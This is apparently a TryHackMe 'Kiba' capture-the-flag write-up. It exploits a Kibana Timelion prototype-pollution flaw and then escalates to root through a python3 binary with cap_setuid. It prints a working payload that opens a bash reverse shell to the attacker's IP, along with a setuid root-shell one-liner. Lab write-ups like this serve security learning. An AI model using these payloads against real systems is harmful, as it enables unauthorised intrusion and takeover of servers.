Introduction

Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.

Alrighty; easy rated.

Nmap

We’ve got four ports: SSH on 22 and HTTP on 80, plus two mystery ports in 5044 and 5601.

Port 80

There’s nothing much on the front page on Port 80 except some ASCII art and a cryptic message; nothing extra in the page source. Time to gobuster:

root@kali:/opt/tryhackme/kiba# gobuster dir -u http://10.10.19.10 -w /usr/share/dirb/wordlists/common.txt

Nothing. Let’s try another port, but we’ll come back to this if necessary.

Port 5601

Visting it in the browser we find another HTTP site running kibana; I guess this is what we’re after based on the title.

This machine is quite ‘hand-holding’ because the questions ask about finding a CVE for the version, so we know there is a readily available exploit. I looked at a couple of sources, the main one was here but also this github repo explains it too.

Essentially it’s go to the Timelion tab, enter the exploit code, hit play and then go to the Canvas tab and wait for your shell. Opening Canvas spawns a new process, and the exploit code pollutes the prototypes if I’ve understood this correctly.

My exploit code was:

.es(*).props(label.proto.env.AAAA=’require(“child_process”).exec(“bash -c 'bash -i>& /dev/tcp/10.9.10.123/1234 0>&1'”);//’) .props(label.proto.env.NODE_OPTIONS=’–require /proc/self/environ’)

On the box

As our user (kiba) we have access to the user flag. The THM page now hints that we’re looking at capabilities for exploit - look, it’s short enough that I’ll just show it here:

kiba@ubuntu:/home/kiba$ getcap -r / 2>/dev/null  
getcap -r / 2>/dev/null  
/home/kiba/.hackmeplease/python3 = cap_setuid+ep  
/usr/bin/mtr = cap_net_raw+ep  
/usr/bin/traceroute6.iputils = cap_net_raw+ep  
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep  
kiba@ubuntu:/home/kiba$ /home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
whoami
root
cd /root
cat root.txt
THM{FLAG_WENT_HERE}

And that was that.